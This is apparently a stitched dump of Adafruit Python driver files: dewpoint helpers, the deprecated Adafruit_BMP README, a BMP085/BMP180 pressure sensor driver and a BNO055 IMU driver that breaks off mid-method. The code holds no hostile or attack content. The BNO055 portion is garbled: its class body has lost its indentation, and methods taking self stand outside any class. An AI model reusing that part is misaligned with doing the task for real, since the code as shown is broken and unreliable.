        pascals = self.read_pressure()
        inches = pascals * 0.0002953
        return inches

    def read_dewpoint(self):
        """Return the calculated dewpoint in C, only accurate at > 50% RH."""
        celsius = self.read_temperature()
        humidity = self.read_humidity()
        dewpoint = celsius - ((100 - humidity) / 5)
        return dewpoint

    def read_dewpoint_f(self):
        """Return the calculated dewpoint in F, only accurate at > 50% RH."""
        dewpoint_c = self.read_dewpoint()
        dewpoint_f = dewpoint_c * 1.8 + 32
        return dewpoint_f
DEPRECATED LIBRARY Adafruit Python BMP
===================
This library has been deprecated!
The BMP085 and BMP180 are no longer made, and have been replaced by the BMP280 and friends.
We are now only using our CircuitPython sensor libraries in Python.
We are leaving this code up for historical/research purposes, but archiving the repository.
Check out this guide for using the BMP280 with Python:
https://learn.adafruit.com/adafruit-bmp280-barometric-pressure-plus-temperature-sensor-breakout
Adafruit Python BMP
------------------------
Python library for accessing the BMP series pressure and temperature sensors like the BMP085/BMP180 on a Raspberry Pi or Beaglebone Black.
Designed specifically to work with the Adafruit BMP085/BMP180 pressure sensors ----> https://www.adafruit.com/products/1603
To install, download the library by clicking the download zip link to the right and unzip the archive somewhere on your Raspberry Pi or Beaglebone Black. Then execute the following command in the directory of the library:
````
sudo python setup.py install
````
Make sure you have internet access on the device so it can download the required dependencies.
See examples of usage in the examples folder.
Adafruit invests time and resources providing this open source code, please support Adafruit and open-source hardware by purchasing products from Adafruit!
Written by Tony DiCola for Adafruit Industries.
MIT license, all text above must be included in any redistribution
| Adafruit-BMP | /Adafruit_BMP-1.5.4.tar.gz/Adafruit_BMP-1.5.4/README.md | README.md |
from __future__ import division
import logging
import time
# BMP085 default address.
BMP085_I2CADDR = 0x77
# Operating Modes (oversampling setting, oss)
BMP085_ULTRALOWPOWER = 0
BMP085_STANDARD = 1
BMP085_HIGHRES = 2
BMP085_ULTRAHIGHRES = 3
# BMP085 Registers
BMP085_CAL_AC1 = 0xAA  # R   Calibration data (16 bits)
BMP085_CAL_AC2 = 0xAC  # R   Calibration data (16 bits)
BMP085_CAL_AC3 = 0xAE  # R   Calibration data (16 bits)
BMP085_CAL_AC4 = 0xB0  # R   Calibration data (16 bits)
BMP085_CAL_AC5 = 0xB2  # R   Calibration data (16 bits)
BMP085_CAL_AC6 = 0xB4  # R   Calibration data (16 bits)
BMP085_CAL_B1 = 0xB6   # R   Calibration data (16 bits)
BMP085_CAL_B2 = 0xB8   # R   Calibration data (16 bits)
BMP085_CAL_MB = 0xBA   # R   Calibration data (16 bits)
BMP085_CAL_MC = 0xBC   # R   Calibration data (16 bits)
BMP085_CAL_MD = 0xBE   # R   Calibration data (16 bits)
BMP085_CONTROL = 0xF4
BMP085_TEMPDATA = 0xF6
BMP085_PRESSUREDATA = 0xF6
# Commands
BMP085_READTEMPCMD = 0x2E
BMP085_READPRESSURECMD = 0x34


class BMP085(object):
    """Driver for the Bosch BMP085/BMP180 barometric pressure sensor."""

    def __init__(self, mode=BMP085_STANDARD, address=BMP085_I2CADDR, i2c=None, **kwargs):
        """Create the sensor object, validate the oversampling mode and
        load the factory calibration.

        Raises:
            ValueError: if mode is not one of the BMP085_* mode constants.
        """
        self._logger = logging.getLogger('Adafruit_BMP.BMP085')
        # Check that mode is valid.
        if mode not in [BMP085_ULTRALOWPOWER, BMP085_STANDARD, BMP085_HIGHRES, BMP085_ULTRAHIGHRES]:
            raise ValueError('Unexpected mode value {0}. Set mode to one of BMP085_ULTRALOWPOWER, BMP085_STANDARD, BMP085_HIGHRES, or BMP085_ULTRAHIGHRES'.format(mode))
        self._mode = mode
        # Create I2C device.
        if i2c is None:
            import Adafruit_GPIO.I2C as I2C
            i2c = I2C
        self._device = i2c.get_i2c_device(address, **kwargs)
        # Load calibration values.
        self._load_calibration()

    def _load_calibration(self):
        """Read the factory calibration coefficients into cal_* attributes."""
        self.cal_AC1 = self._device.readS16BE(BMP085_CAL_AC1)   # INT16
        self.cal_AC2 = self._device.readS16BE(BMP085_CAL_AC2)   # INT16
        self.cal_AC3 = self._device.readS16BE(BMP085_CAL_AC3)   # INT16
        self.cal_AC4 = self._device.readU16BE(BMP085_CAL_AC4)   # UINT16
        self.cal_AC5 = self._device.readU16BE(BMP085_CAL_AC5)   # UINT16
        self.cal_AC6 = self._device.readU16BE(BMP085_CAL_AC6)   # UINT16
        self.cal_B1 = self._device.readS16BE(BMP085_CAL_B1)     # INT16
        self.cal_B2 = self._device.readS16BE(BMP085_CAL_B2)     # INT16
        self.cal_MB = self._device.readS16BE(BMP085_CAL_MB)     # INT16
        self.cal_MC = self._device.readS16BE(BMP085_CAL_MC)     # INT16
        self.cal_MD = self._device.readS16BE(BMP085_CAL_MD)     # INT16
        self._logger.debug('AC1 = {0:6d}'.format(self.cal_AC1))
        self._logger.debug('AC2 = {0:6d}'.format(self.cal_AC2))
        self._logger.debug('AC3 = {0:6d}'.format(self.cal_AC3))
        self._logger.debug('AC4 = {0:6d}'.format(self.cal_AC4))
        self._logger.debug('AC5 = {0:6d}'.format(self.cal_AC5))
        self._logger.debug('AC6 = {0:6d}'.format(self.cal_AC6))
        self._logger.debug('B1 = {0:6d}'.format(self.cal_B1))
        self._logger.debug('B2 = {0:6d}'.format(self.cal_B2))
        self._logger.debug('MB = {0:6d}'.format(self.cal_MB))
        self._logger.debug('MC = {0:6d}'.format(self.cal_MC))
        self._logger.debug('MD = {0:6d}'.format(self.cal_MD))

    def _load_datasheet_calibration(self):
        # Set calibration from values in the datasheet example. Useful for debugging the
        # temp and pressure calculation accuracy.
        self.cal_AC1 = 408
        self.cal_AC2 = -72
        self.cal_AC3 = -14383
        self.cal_AC4 = 32741
        self.cal_AC5 = 32757
        self.cal_AC6 = 23153
        self.cal_B1 = 6190
        self.cal_B2 = 4
        self.cal_MB = -32767
        self.cal_MC = -8711
        self.cal_MD = 2868

    def read_raw_temp(self):
        """Reads the raw (uncompensated) temperature from the sensor."""
        self._device.write8(BMP085_CONTROL, BMP085_READTEMPCMD)
        time.sleep(0.005)  # Wait 5ms
        raw = self._device.readU16BE(BMP085_TEMPDATA)
        self._logger.debug('Raw temp 0x{0:X} ({1})'.format(raw & 0xFFFF, raw))
        return raw

    def read_raw_pressure(self):
        """Reads the raw (uncompensated) pressure level from the sensor."""
        self._device.write8(BMP085_CONTROL, BMP085_READPRESSURECMD + (self._mode << 6))
        # Conversion time depends on the oversampling mode (datasheet table).
        if self._mode == BMP085_ULTRALOWPOWER:
            time.sleep(0.005)
        elif self._mode == BMP085_HIGHRES:
            time.sleep(0.014)
        elif self._mode == BMP085_ULTRAHIGHRES:
            time.sleep(0.026)
        else:
            time.sleep(0.008)
        msb = self._device.readU8(BMP085_PRESSUREDATA)
        lsb = self._device.readU8(BMP085_PRESSUREDATA+1)
        xlsb = self._device.readU8(BMP085_PRESSUREDATA+2)
        raw = ((msb << 16) + (lsb << 8) + xlsb) >> (8 - self._mode)
        self._logger.debug('Raw pressure 0x{0:04X} ({1})'.format(raw & 0xFFFF, raw))
        return raw

    def _compute_b5(self, UT):
        # Shared "true temperature" intermediate B5 (datasheet section 3.5).
        # Used by both the temperature and the pressure compensation; it was
        # previously duplicated in read_temperature() and read_pressure().
        X1 = ((UT - self.cal_AC6) * self.cal_AC5) >> 15
        X2 = (self.cal_MC << 11) // (X1 + self.cal_MD)
        return X1 + X2

    def read_temperature(self):
        """Gets the compensated temperature in degrees celsius."""
        UT = self.read_raw_temp()
        # Datasheet value for debugging:
        #UT = 27898
        # Calculations below are taken straight from section 3.5 of the datasheet.
        B5 = self._compute_b5(UT)
        temp = ((B5 + 8) >> 4) / 10.0
        self._logger.debug('Calibrated temperature {0} C'.format(temp))
        return temp

    def read_pressure(self):
        """Gets the compensated pressure in Pascals."""
        UT = self.read_raw_temp()
        UP = self.read_raw_pressure()
        # Datasheet values for debugging:
        #UT = 27898
        #UP = 23843
        # Calculations below are taken straight from section 3.5 of the datasheet.
        # Calculate true temperature coefficient B5.
        B5 = self._compute_b5(UT)
        self._logger.debug('B5 = {0}'.format(B5))
        # Pressure Calculations
        B6 = B5 - 4000
        self._logger.debug('B6 = {0}'.format(B6))
        X1 = (self.cal_B2 * (B6 * B6) >> 12) >> 11
        X2 = (self.cal_AC2 * B6) >> 11
        X3 = X1 + X2
        B3 = (((self.cal_AC1 * 4 + X3) << self._mode) + 2) // 4
        self._logger.debug('B3 = {0}'.format(B3))
        X1 = (self.cal_AC3 * B6) >> 13
        X2 = (self.cal_B1 * ((B6 * B6) >> 12)) >> 16
        X3 = ((X1 + X2) + 2) >> 2
        B4 = (self.cal_AC4 * (X3 + 32768)) >> 15
        self._logger.debug('B4 = {0}'.format(B4))
        B7 = (UP - B3) * (50000 >> self._mode)
        self._logger.debug('B7 = {0}'.format(B7))
        if B7 < 0x80000000:
            p = (B7 * 2) // B4
        else:
            p = (B7 // B4) * 2
        X1 = (p >> 8) * (p >> 8)
        X1 = (X1 * 3038) >> 16
        X2 = (-7357 * p) >> 16
        p = p + ((X1 + X2 + 3791) >> 4)
        self._logger.debug('Pressure {0} Pa'.format(p))
        return p

    def read_altitude(self, sealevel_pa=101325.0):
        """Calculates the altitude in meters."""
        # Calculation taken straight from section 3.6 of the datasheet.
        pressure = float(self.read_pressure())
        altitude = 44330.0 * (1.0 - pow(pressure / sealevel_pa, (1.0/5.255)))
        self._logger.debug('Altitude {0} m'.format(altitude))
        return altitude

    def read_sealevel_pressure(self, altitude_m=0.0):
        """Calculates the pressure at sealevel when given a known altitude in
        meters. Returns a value in Pascals."""
        pressure = float(self.read_pressure())
        p0 = pressure / pow(1.0 - altitude_m/44330.0, 5.255)
        self._logger.debug('Sealevel pressure {0} Pa'.format(p0))
        return p0
import binascii
import logging
import struct
import time
import serial
# --- BNO055 register map and mode constants ---
# I2C addresses
BNO055_ADDRESS_A = 0x28
BNO055_ADDRESS_B = 0x29
BNO055_ID = 0xA0
# Page id register definition
BNO055_PAGE_ID_ADDR = 0X07
# PAGE0 REGISTER DEFINITION START
BNO055_CHIP_ID_ADDR = 0x00
BNO055_ACCEL_REV_ID_ADDR = 0x01
BNO055_MAG_REV_ID_ADDR = 0x02
BNO055_GYRO_REV_ID_ADDR = 0x03
BNO055_SW_REV_ID_LSB_ADDR = 0x04
BNO055_SW_REV_ID_MSB_ADDR = 0x05
BNO055_BL_REV_ID_ADDR = 0X06
# Accel data register
BNO055_ACCEL_DATA_X_LSB_ADDR = 0X08
BNO055_ACCEL_DATA_X_MSB_ADDR = 0X09
BNO055_ACCEL_DATA_Y_LSB_ADDR = 0X0A
BNO055_ACCEL_DATA_Y_MSB_ADDR = 0X0B
BNO055_ACCEL_DATA_Z_LSB_ADDR = 0X0C
BNO055_ACCEL_DATA_Z_MSB_ADDR = 0X0D
# Mag data register
BNO055_MAG_DATA_X_LSB_ADDR = 0X0E
BNO055_MAG_DATA_X_MSB_ADDR = 0X0F
BNO055_MAG_DATA_Y_LSB_ADDR = 0X10
BNO055_MAG_DATA_Y_MSB_ADDR = 0X11
BNO055_MAG_DATA_Z_LSB_ADDR = 0X12
BNO055_MAG_DATA_Z_MSB_ADDR = 0X13
# Gyro data registers
BNO055_GYRO_DATA_X_LSB_ADDR = 0X14
BNO055_GYRO_DATA_X_MSB_ADDR = 0X15
BNO055_GYRO_DATA_Y_LSB_ADDR = 0X16
BNO055_GYRO_DATA_Y_MSB_ADDR = 0X17
BNO055_GYRO_DATA_Z_LSB_ADDR = 0X18
BNO055_GYRO_DATA_Z_MSB_ADDR = 0X19
# Euler data registers (heading/roll/pitch)
BNO055_EULER_H_LSB_ADDR = 0X1A
BNO055_EULER_H_MSB_ADDR = 0X1B
BNO055_EULER_R_LSB_ADDR = 0X1C
BNO055_EULER_R_MSB_ADDR = 0X1D
BNO055_EULER_P_LSB_ADDR = 0X1E
BNO055_EULER_P_MSB_ADDR = 0X1F
# Quaternion data registers
BNO055_QUATERNION_DATA_W_LSB_ADDR = 0X20
BNO055_QUATERNION_DATA_W_MSB_ADDR = 0X21
BNO055_QUATERNION_DATA_X_LSB_ADDR = 0X22
BNO055_QUATERNION_DATA_X_MSB_ADDR = 0X23
BNO055_QUATERNION_DATA_Y_LSB_ADDR = 0X24
BNO055_QUATERNION_DATA_Y_MSB_ADDR = 0X25
BNO055_QUATERNION_DATA_Z_LSB_ADDR = 0X26
BNO055_QUATERNION_DATA_Z_MSB_ADDR = 0X27
# Linear acceleration data registers
BNO055_LINEAR_ACCEL_DATA_X_LSB_ADDR = 0X28
BNO055_LINEAR_ACCEL_DATA_X_MSB_ADDR = 0X29
BNO055_LINEAR_ACCEL_DATA_Y_LSB_ADDR = 0X2A
BNO055_LINEAR_ACCEL_DATA_Y_MSB_ADDR = 0X2B
BNO055_LINEAR_ACCEL_DATA_Z_LSB_ADDR = 0X2C
BNO055_LINEAR_ACCEL_DATA_Z_MSB_ADDR = 0X2D
# Gravity data registers
BNO055_GRAVITY_DATA_X_LSB_ADDR = 0X2E
BNO055_GRAVITY_DATA_X_MSB_ADDR = 0X2F
BNO055_GRAVITY_DATA_Y_LSB_ADDR = 0X30
BNO055_GRAVITY_DATA_Y_MSB_ADDR = 0X31
BNO055_GRAVITY_DATA_Z_LSB_ADDR = 0X32
BNO055_GRAVITY_DATA_Z_MSB_ADDR = 0X33
# Temperature data register
BNO055_TEMP_ADDR = 0X34
# Status registers
BNO055_CALIB_STAT_ADDR = 0X35
BNO055_SELFTEST_RESULT_ADDR = 0X36
BNO055_INTR_STAT_ADDR = 0X37
BNO055_SYS_CLK_STAT_ADDR = 0X38
BNO055_SYS_STAT_ADDR = 0X39
BNO055_SYS_ERR_ADDR = 0X3A
# Unit selection register
BNO055_UNIT_SEL_ADDR = 0X3B
BNO055_DATA_SELECT_ADDR = 0X3C
# Mode registers
BNO055_OPR_MODE_ADDR = 0X3D
BNO055_PWR_MODE_ADDR = 0X3E
BNO055_SYS_TRIGGER_ADDR = 0X3F
BNO055_TEMP_SOURCE_ADDR = 0X40
# Axis remap registers
BNO055_AXIS_MAP_CONFIG_ADDR = 0X41
BNO055_AXIS_MAP_SIGN_ADDR = 0X42
# Axis remap values (written into the axis remap registers above)
AXIS_REMAP_X = 0x00
AXIS_REMAP_Y = 0x01
AXIS_REMAP_Z = 0x02
AXIS_REMAP_POSITIVE = 0x00
AXIS_REMAP_NEGATIVE = 0x01
# SIC registers
BNO055_SIC_MATRIX_0_LSB_ADDR = 0X43
BNO055_SIC_MATRIX_0_MSB_ADDR = 0X44
BNO055_SIC_MATRIX_1_LSB_ADDR = 0X45
BNO055_SIC_MATRIX_1_MSB_ADDR = 0X46
BNO055_SIC_MATRIX_2_LSB_ADDR = 0X47
BNO055_SIC_MATRIX_2_MSB_ADDR = 0X48
BNO055_SIC_MATRIX_3_LSB_ADDR = 0X49
BNO055_SIC_MATRIX_3_MSB_ADDR = 0X4A
BNO055_SIC_MATRIX_4_LSB_ADDR = 0X4B
BNO055_SIC_MATRIX_4_MSB_ADDR = 0X4C
BNO055_SIC_MATRIX_5_LSB_ADDR = 0X4D
BNO055_SIC_MATRIX_5_MSB_ADDR = 0X4E
BNO055_SIC_MATRIX_6_LSB_ADDR = 0X4F
BNO055_SIC_MATRIX_6_MSB_ADDR = 0X50
BNO055_SIC_MATRIX_7_LSB_ADDR = 0X51
BNO055_SIC_MATRIX_7_MSB_ADDR = 0X52
BNO055_SIC_MATRIX_8_LSB_ADDR = 0X53
BNO055_SIC_MATRIX_8_MSB_ADDR = 0X54
# Accelerometer Offset registers
ACCEL_OFFSET_X_LSB_ADDR = 0X55
ACCEL_OFFSET_X_MSB_ADDR = 0X56
ACCEL_OFFSET_Y_LSB_ADDR = 0X57
ACCEL_OFFSET_Y_MSB_ADDR = 0X58
ACCEL_OFFSET_Z_LSB_ADDR = 0X59
ACCEL_OFFSET_Z_MSB_ADDR = 0X5A
# Magnetometer Offset registers
MAG_OFFSET_X_LSB_ADDR = 0X5B
MAG_OFFSET_X_MSB_ADDR = 0X5C
MAG_OFFSET_Y_LSB_ADDR = 0X5D
MAG_OFFSET_Y_MSB_ADDR = 0X5E
MAG_OFFSET_Z_LSB_ADDR = 0X5F
MAG_OFFSET_Z_MSB_ADDR = 0X60
# Gyroscope Offset registers
GYRO_OFFSET_X_LSB_ADDR = 0X61
GYRO_OFFSET_X_MSB_ADDR = 0X62
GYRO_OFFSET_Y_LSB_ADDR = 0X63
GYRO_OFFSET_Y_MSB_ADDR = 0X64
GYRO_OFFSET_Z_LSB_ADDR = 0X65
GYRO_OFFSET_Z_MSB_ADDR = 0X66
# Radius registers
ACCEL_RADIUS_LSB_ADDR = 0X67
ACCEL_RADIUS_MSB_ADDR = 0X68
MAG_RADIUS_LSB_ADDR = 0X69
MAG_RADIUS_MSB_ADDR = 0X6A
# Power modes
POWER_MODE_NORMAL = 0X00
POWER_MODE_LOWPOWER = 0X01
POWER_MODE_SUSPEND = 0X02
# Operation mode settings
OPERATION_MODE_CONFIG = 0X00
OPERATION_MODE_ACCONLY = 0X01
OPERATION_MODE_MAGONLY = 0X02
OPERATION_MODE_GYRONLY = 0X03
OPERATION_MODE_ACCMAG = 0X04
OPERATION_MODE_ACCGYRO = 0X05
OPERATION_MODE_MAGGYRO = 0X06
OPERATION_MODE_AMG = 0X07
OPERATION_MODE_IMUPLUS = 0X08
OPERATION_MODE_COMPASS = 0X09
OPERATION_MODE_M4G = 0X0A
OPERATION_MODE_NDOF_FMC_OFF = 0X0B
OPERATION_MODE_NDOF = 0X0C
# Module-level logger used by the BNO055 class below.
logger = logging.getLogger(__name__)
class BNO055(object):
def __init__(self, rst=None, address=BNO055_ADDRESS_A, i2c=None, gpio=None,
serial_port=None, serial_timeout_sec=5, **kwargs):
# If reset pin is provided save it and a reference to provided GPIO
# bus (or the default system GPIO bus if none is provided).
self._rst = rst
if self._rst is not None:
if gpio is None:
import Adafruit_GPIO as GPIO
gpio = GPIO.get_platform_gpio()
self._gpio = gpio
# Setup the reset pin as an output at a high level.
self._gpio.setup(self._rst, GPIO.OUT)
self._gpio.set_high(self._rst)
# Wait a 650 milliseconds in case setting the reset high reset the chip.
time.sleep(0.65)
self._serial = None
self._i2c_device = None
if serial_port is not None:
# Use serial communication if serial_port name is provided.
# Open the serial port at 115200 baud, 8N1. Add a 5 second timeout
# to prevent hanging if device is disconnected.
self._serial = serial.Serial(serial_port, 115200, timeout=serial_timeout_sec,
writeTimeout=serial_timeout_sec)
else:
# Use I2C if no serial port is provided.
# Assume we're using platform's default I2C bus if none is specified.
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
# Save a reference to the I2C device instance for later communication.
self._i2c_device = i2c.get_i2c_device(address, **kwargs)
def _serial_send(self, command, ack=True, max_attempts=5):
# Send a serial command and automatically handle if it needs to be resent
# because of a bus error. If ack is True then an ackowledgement is
# expected and only up to the maximum specified attempts will be made
# to get a good acknowledgement (default is 5). If ack is False then
# no acknowledgement is expected (like when resetting the device).
attempts = 0
while True:
# Flush any pending received data to get into a clean state.
self._serial.flushInput()
# Send the data.
self._serial.write(command)
logger.debug('Serial send: 0x{0}'.format(binascii.hexlify(command)))
# Stop if no acknowledgment is expected.
if not ack:
return
# Read acknowledgement response (2 bytes).
resp = bytearray(self._serial.read(2))
logger.debug('Serial receive: 0x{0}'.format(binascii.hexlify(resp)))
if resp is None or len(resp) != 2:
raise RuntimeError('Timeout waiting for serial acknowledge, is the BNO055 connected?')
# Stop if there's no bus error (0xEE07 response) and return response bytes.
if not (resp[0] == 0xEE and resp[1] == 0x07):
return resp
# Else there was a bus error so resend, as recommended in UART app
# note at:
# http://ae-bst.resource.bosch.com/media/products/dokumente/bno055/BST-BNO055-AN012-00.pdf
attempts += 1
if attempts >= max_attempts:
raise RuntimeError('Exceeded maximum attempts to acknowledge serial command without bus error!')
def _write_bytes(self, address, data, ack=True):
# Write a list of 8-bit values starting at the provided register address.
if self._i2c_device is not None:
# I2C write.
self._i2c_device.writeList(address, data)
else:
# Build and send serial register write command.
command = bytearray(4+len(data))
command[0] = 0xAA # Start byte
command[1] = 0x00 # Write
command[2] = address & 0xFF
command[3] = len(data) & 0xFF
command[4:] = map(lambda x: x & 0xFF, data)
resp = self._serial_send(command, ack=ack)
# Verify register write succeeded if there was an acknowledgement.
if resp[0] != 0xEE and resp[1] != 0x01:
raise RuntimeError('Register write error: 0x{0}'.format(binascii.hexlify(resp)))
def _write_byte(self, address, value, ack=True):
# Write an 8-bit value to the provided register address. If ack is True
# then expect an acknowledgement in serial mode, otherwise ignore any
# acknowledgement (necessary when resetting the device).
if self._i2c_device is not None:
# I2C write.
self._i2c_device.write8(address, value)
else:
# Build and send serial register write command.
command = bytearray(5)
command[0] = 0xAA # Start byte
command[1] = 0x00 # Write
command[2] = address & 0xFF
command[3] = 1 # Length (1 byte)
command[4] = value & 0xFF
resp = self._serial_send(command, ack=ack)
# Verify register write succeeded if there was an acknowledgement.
if ack and resp[0] != 0xEE and resp[1] != 0x01:
raise RuntimeError('Register write error: 0x{0}'.format(binascii.hexlify(resp)))
def _read_bytes(self, address, length):
    """Read ``length`` unsigned bytes starting at register ``address`` and
    return them as a bytearray.
    """
    if self._i2c_device is not None:
        # I2C path: a single multi-byte register read.
        return bytearray(self._i2c_device.readList(address, length))
    # Serial path: 0xAA start byte, 0x01 = read, address, count.
    request = bytearray((0xAA, 0x01, address & 0xFF, length & 0xFF))
    resp = self._serial_send(request)
    # A register read response starts with 0xBB; anything else is an error.
    if resp[0] != 0xBB:
        raise RuntimeError('Register read error: 0x{0}'.format(binascii.hexlify(resp)))
    # The second response byte is the payload length; pull that many bytes.
    expected = resp[1]
    payload = bytearray(self._serial.read(expected))
    logger.debug('Received: 0x{0}'.format(binascii.hexlify(payload)))
    if payload is None or len(payload) != expected:
        raise RuntimeError('Timeout waiting to read data, is the BNO055 connected?')
    return payload
def _read_byte(self, address):
    """Read one unsigned 8-bit value from the register at ``address``."""
    if self._i2c_device is None:
        # Serial transport: issue a one-byte register read.
        return self._read_bytes(address, 1)[0]
    # I2C transport.
    return self._i2c_device.readU8(address)
def _read_signed_byte(self, address):
    """Read one byte from ``address`` and interpret it as a signed
    (two's-complement) 8-bit value in the range -128..127.
    """
    raw = self._read_byte(address)
    return raw - 256 if raw > 127 else raw
def _config_mode(self):
    """Switch the chip into CONFIG mode so configuration registers can be
    changed.
    """
    self.set_mode(OPERATION_MODE_CONFIG)
def _operation_mode(self):
    """Restore the user-selected operation mode (stored in ``self._mode``)
    so sensor data can be read again.
    """
    self.set_mode(self._mode)
def begin(self, mode=OPERATION_MODE_NDOF):
    """Initialize the BNO055 sensor. Must be called once before any other
    BNO055 library functions. Will return True if the BNO055 was
    successfully initialized, and False otherwise.

    :param mode: operation mode to enter after initialization (defaults
        to the NDOF sensor-fusion mode).
    """
    # Save the desired normal operation mode.
    self._mode = mode
    # First send a throw-away command and ignore any response or I2C errors
    # just to make sure the BNO is in a good state and ready to accept
    # commands (this seems to be necessary after a hard power down).
    try:
        self._write_byte(BNO055_PAGE_ID_ADDR, 0, ack=False)
    except IOError:
        # Swallow an IOError that might be raised by an I2C issue. Only do
        # this for this very first command to help get the BNO and board's
        # I2C into a clear state ready to accept the next commands.
        pass
    # Make sure we're in config mode and on page 0.
    self._config_mode()
    self._write_byte(BNO055_PAGE_ID_ADDR, 0)
    # Check the chip ID; a mismatch means the device is absent or not a
    # BNO055, so report failure instead of raising.
    bno_id = self._read_byte(BNO055_CHIP_ID_ADDR)
    logger.debug('Read chip ID: 0x{0:02X}'.format(bno_id))
    if bno_id != BNO055_ID:
        return False
    # Reset the device.
    if self._rst is not None:
        # Use the hardware reset pin if provided.
        # Go low for a short period, then high to signal a reset.
        self._gpio.set_low(self._rst)
        time.sleep(0.01)  # 10ms
        self._gpio.set_high(self._rst)
    else:
        # Else use the reset command. Note that ack=False is sent because
        # the chip doesn't seem to ack a reset in serial mode (by design?).
        self._write_byte(BNO055_SYS_TRIGGER_ADDR, 0x20, ack=False)
    # Wait 650ms after reset for chip to be ready (as suggested
    # in datasheet).
    time.sleep(0.65)
    # Set to normal power mode.
    self._write_byte(BNO055_PWR_MODE_ADDR, POWER_MODE_NORMAL)
    # Default to internal oscillator (clear SYS_TRIGGER).
    self._write_byte(BNO055_SYS_TRIGGER_ADDR, 0x0)
    # Enter normal operation mode.
    self._operation_mode()
    return True
def set_mode(self, mode):
    """Set the BNO055 operation mode.  ``mode`` should be one of the values
    from tables 3-3 and 3-5 of the datasheet:
    http://www.adafruit.com/datasheets/BST_BNO055_DS000_12.pdf
    """
    self._write_byte(BNO055_OPR_MODE_ADDR, mode & 0xFF)
    # Pause 30ms after the mode switch (the datasheet recommends 19ms; a
    # little extra absorbs kernel scheduling jitter).
    time.sleep(0.03)
def get_revision(self):
    """Return revision information about the BNO055 chip as a 5-tuple:
    (software revision, bootloader version, accelerometer ID,
    magnetometer ID, gyro ID).
    """
    # Read each ID/revision register in turn.
    accel_id = self._read_byte(BNO055_ACCEL_REV_ID_ADDR)
    mag_id = self._read_byte(BNO055_MAG_REV_ID_ADDR)
    gyro_id = self._read_byte(BNO055_GYRO_REV_ID_ADDR)
    bootloader = self._read_byte(BNO055_BL_REV_ID_ADDR)
    sw_lsb = self._read_byte(BNO055_SW_REV_ID_LSB_ADDR)
    sw_msb = self._read_byte(BNO055_SW_REV_ID_MSB_ADDR)
    # The software revision is a 16-bit value split across two registers.
    software = ((sw_msb << 8) | sw_lsb) & 0xFFFF
    return (software, bootloader, accel_id, mag_id, gyro_id)
def set_external_crystal(self, external_crystal):
    """Select the clock source: pass True to use an external crystal,
    False to use the internal oscillator (the default behavior).
    """
    # Clock selection is a configuration change, so enter config mode.
    self._config_mode()
    # Bit 7 of SYS_TRIGGER selects the external crystal.
    trigger = 0x80 if external_crystal else 0x00
    self._write_byte(BNO055_SYS_TRIGGER_ADDR, trigger)
    # Resume normal operation.
    self._operation_mode()
def get_system_status(self, run_self_test=True):
    """Return a tuple with status information. Three values will be returned:
      - System status register value with the following meaning:
          0 = Idle
          1 = System Error
          2 = Initializing Peripherals
          3 = System Initialization
          4 = Executing Self-Test
          5 = Sensor fusion algorithm running
          6 = System running without fusion algorithms
      - Self test result register value with the following meaning:
          Bit value: 1 = test passed, 0 = test failed
          Bit 0 = Accelerometer self test
          Bit 1 = Magnetometer self test
          Bit 2 = Gyroscope self test
          Bit 3 = MCU self test
          Value of 0x0F = all good!
      - System error register value with the following meaning:
          0 = No error
          1 = Peripheral initialization error
          2 = System initialization error
          3 = Self test result failed
          4 = Register map value out of range
          5 = Register map address out of range
          6 = Register map write error
          7 = BNO low power mode not available for selected operation mode
          8 = Accelerometer power mode not available
          9 = Fusion algorithm configuration error
          10 = Sensor configuration error
    If run_self_test is passed in as False then no self test is performed and
    None will be returned for the self test result.  Note that running a
    self test requires going into config mode which will stop the fusion
    engine from running.
    """
    self_test = None
    if run_self_test:
        # Switch to configuration mode if running self test.
        self._config_mode()
        # Perform a self test: read-modify-write SYS_TRIGGER so only the
        # self-test bit (bit 0) is changed.
        sys_trigger = self._read_byte(BNO055_SYS_TRIGGER_ADDR)
        self._write_byte(BNO055_SYS_TRIGGER_ADDR, sys_trigger | 0x1)
        # Wait for self test to finish.
        time.sleep(1.0)
        # Read test result.
        self_test = self._read_byte(BNO055_SELFTEST_RESULT_ADDR)
        # Go back to operation mode.
        self._operation_mode()
    # Now read status and error registers.
    status = self._read_byte(BNO055_SYS_STAT_ADDR)
    error = self._read_byte(BNO055_SYS_ERR_ADDR)
    # Return the results as a tuple of all 3 values.
    return (status, self_test, error)
def get_calibration_status(self):
    """Read the calibration status of the sensors and return it as a
    4-tuple ``(system, gyroscope, accelerometer, magnetometer)`` where
    each value is 3 for fully calibrated down to 0 for not calibrated.
    """
    # All four 2-bit fields live in the single CALIB_STAT register.
    cal_status = self._read_byte(BNO055_CALIB_STAT_ADDR)
    # (renamed from `sys` to avoid shadowing the stdlib module name)
    sys_cal = (cal_status >> 6) & 0x03
    gyro_cal = (cal_status >> 4) & 0x03
    accel_cal = (cal_status >> 2) & 0x03
    mag_cal = cal_status & 0x03
    return (sys_cal, gyro_cal, accel_cal, mag_cal)
def get_calibration(self):
    """Return the sensor's calibration data as a list of 22 ints.  The
    result can be persisted and later restored with set_calibration to
    skip a full recalibration.
    """
    # Offsets are only readable in config mode (datasheet section 3.10.4).
    self._config_mode()
    raw = self._read_bytes(ACCEL_OFFSET_X_LSB_ADDR, 22)
    # Resume normal operation before returning.
    self._operation_mode()
    # Convert the bytearray to a plain list so callers can serialize it.
    return list(raw)
def set_calibration(self, data):
    """Load previously-saved calibration data into the sensor.

    :param data: a sequence of exactly 22 byte values, as produced by
        get_calibration.
    :raises ValueError: if ``data`` is None or not 22 bytes long.
    """
    # Validate before touching the hardware.
    if data is None or len(data) != 22:
        raise ValueError('Expected a list of 22 bytes for calibration data.')
    # Offsets are only writable in config mode (datasheet section 3.10.4).
    self._config_mode()
    self._write_bytes(ACCEL_OFFSET_X_LSB_ADDR, data)
    # Resume normal operation.
    self._operation_mode()
def get_axis_remap(self):
    """Return the axis remap configuration as a 6-tuple:
    ``(x, y, z, x_sign, y_sign, z_sign)``.

    The first three values are each one of AXIS_REMAP_X, AXIS_REMAP_Y or
    AXIS_REMAP_Z, indicating which physical axis the chip's X, Y and Z
    axes are mapped to.  The last three are AXIS_REMAP_POSITIVE or
    AXIS_REMAP_NEGATIVE and give the sign (normal or inverted) of each
    axis.  See section 3.4 of the datasheet for the default chip
    orientation relative to the dot on the package.
    """
    # Axis assignments: two bits per axis in AXIS_MAP_CONFIG.
    map_config = self._read_byte(BNO055_AXIS_MAP_CONFIG_ADDR)
    # Axis signs: one bit per axis in AXIS_MAP_SIGN.
